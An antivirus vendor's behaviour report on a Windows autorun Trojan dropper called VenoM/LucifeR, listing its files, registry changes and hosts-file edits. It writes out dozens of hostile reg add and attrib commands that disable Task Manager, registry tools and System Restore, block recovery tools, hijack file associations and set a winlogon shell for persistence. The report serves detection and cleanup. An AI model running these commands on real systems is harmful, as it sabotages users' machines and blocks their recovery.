Virus: TR/Drop.Agent.tzb
Date discovered: 29/12/2008
Type: Trojan
Subtype: Dropper
In the wild: Yes
Reported Infections: Low to medium
Distribution Potential: Low to medium
Damage Potential: Low to medium
Static file: Yes
File size: 112.640 Bytes
MD5 checksum: 46d5d944e89a3584f20583b3f2de51cb
VDF version: 7.01.01.40
IVDF version: 7.01.01.43 - Monday, December 29, 2008

General
Method of propagation:
   • Autorun feature


Aliases:
   • McAfee: W32/YahLover.worm.gen
   • Sophos: W32/Autorun-BLY
   • Bitdefender: Worm.Generic.52609
   • Panda: W32/VenoMLucifer.A
   • ESET: BAT/Autorun.B


Platforms / OS:
   • Windows 2000
   • Windows XP
   • Windows 2003


Side effects:
   • Blocks access to certain websites
   • Blocks access to security websites
   • Drops malicious files
   • Lowers security settings
   • Registry modification

Files
It copies itself to the following location:
   • %drive%\System Volume Information\LucifeR.exe



It overwrites the following file:
   • %SYSDIR%\drivers\etc\hosts



The following files are created:

   • %drive%\AutoruN.inf
     This is a non-malicious text file with the following content:
       • %code that runs malware%
   • %SYSDIR%\COM17949.DLL
   • %TEMPDIR%\bt38830.bat
     Further investigation showed that this file is malware, too. Detected as: BAT/Mevon.A




It tries to execute the following files:

– Filename:
   • cmd.exe /c %TEMPDIR%\bt38830.bat %executed file%


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d "2" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d "0" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoRecycleFiles /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyComputer /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t reg_dword /d "1" /f


– Filename:
   • taskkill /f /im Ad-Watch.EXE


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "0" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableConfig /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableSR /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 1 /t reg_sz /d "notepad.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 2 /t reg_sz /d "HijackThis.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /t reg_sz /d "wordpad.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 4 /t reg_sz /d "rstrui.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "taskmgr.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "msconfig.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 6 /t reg_sz /d "regedit.exe" /f


– Filename:
   • attrib +s +h "%HOME%\Application Data\Micro$oft\desktop.log"


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 7 /t reg_sz /d "HiJackThis_v2.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 10 /t reg_sz /d "cmd.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 11 /t reg_sz /d "ibprocman.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 12 /t reg_sz /d "explorer.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 13 /t reg_sz /d "integrator.exe.exe" /f


– Filename:
   • find /i "metroflog" "%SYSDIR%\drivers\etc\hosts"


– Filename:
   • reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "www.google.com.mx" /f


– Filename:
   • reg add "HKCU\VenoM.LucifeR.17949179491794917949\suriV" /v "Tu has sido derrotado de nuevo por VenoM" /d "Burn in Hell" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\GPEDIT.MSC" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\attrib.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • attrib -s -h -r -a %executed file%


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\command.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\Dxdiag.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\notepad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\regedit.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\taskkill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\tskill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\HELPCTR.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Run" /v CTFMON.EXE /t reg_sz /d "%WINDIR%\svchost.exe" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\MSCONFIG.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\VenoM.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\wordpad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • attrib +h +s C:\WINDOWS


– Filename:
   • attrib +s +h "%SYSDIR%"


– Filename:
   • attrib +s +h "%WINDIR%\notepad.exe"


– Filename:
   • attrib +s +h "%SYSDIR%\notepad.exe"


– Filename:
   • attrib +s +h +r +a %drive%\AutoruN.inf


– Filename:
   • attrib +s +h "%drive%\System Volume Information\*.exe"


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon" /v Shell /t reg_sz /d "Explorer.exe %recycle bin%\NTDETECT.EXE" /f


– Filename:
   • attrib +s +h "%drive%\System Volume Information"


– Filename:
   • attrib -h -s -r -a %executed file%


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f

Registry
The following registry keys are added:

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\MSCONFIG.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "DisallowRun"=dword:0x00000001
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001
   • "NoPropertiesMyComputer"=dword:0x00000001
   • "NoRecycleFiles"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\HELPCTR.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore]
   • "DisableConfig"=dword:0x00000001
   • "DisableSR"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\VenoM.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\GPEDIT.MSC]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\Dxdiag.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\VenoM.LucifeR.17949179491794917949\suriV]
   • "Tu has sido derrotado de nuevo por VenoM"="Burn in Hell"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\tskill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\taskkill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\regedit.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\attrib.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\command.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun]
   • "1"="notepad.exe"
   • "10"="cmd.exe"
   • "11"="ibprocman.exe"
   • "12"="explorer.exe"
   • "13"="integrator.exe.exe"
   • "2"="HijackThis.exe"
   • "3"="wordpad.exe"
   • "4"="rstrui.exe"
   • "5"="msconfig.exe"
   • "6"="regedit.exe"
   • "7"="HiJackThis_v2.exe"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\notepad.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\Software\Microsoft\windows\CurrentVersion\Run]
   • "CTFMON.EXE"="%WINDIR%\svchost.exe"



The following registry keys are changed:

– [HKLM\SOFTWARE\Classes\VBSFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inifile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\wordpad.exe]
   New value:
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\JSFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\piffile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\VBEFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inffile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\htmlfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced]
   New value:
   • "Hidden"=dword:0x00000002
   • "HideFileExt"=dword:0x00000001
   • "ShowSuperHidden"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
   New value:
   • "CheckedValue"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon]
   New value:
   • "Shell"="Explorer.exe %recycle bin%\NTDETECT.EXE"

– [HKLM\SOFTWARE\Classes\batfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\Software\Microsoft\Internet Explorer\Main]
   New value:
   • "Start Page"="www.google.com.mx"

– [HKLM\SOFTWARE\Classes\cmdfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\regfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\txtfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

Hosts
The hosts file is modified as follows:

– Existing entries remain unmodified.

– Access to the following domains is effectively blocked:
   • 127.0.0.1 www.metroflog.com
   • 127.0.0.1 www.hotmail.com
   • 127.0.0.1 www.google.com


Process termination
The following process is terminated:
   • Ad-Watch.EXE


File details
Programming language:
The malware program was written in Delphi.


Runtime packer:
To hinder detection and reduce the file size, it is packed with a runtime packer.

Description inserted by Petre Galan on Friday, February 25, 2011
Description updated by Petre Galan on Friday, February 25, 2011
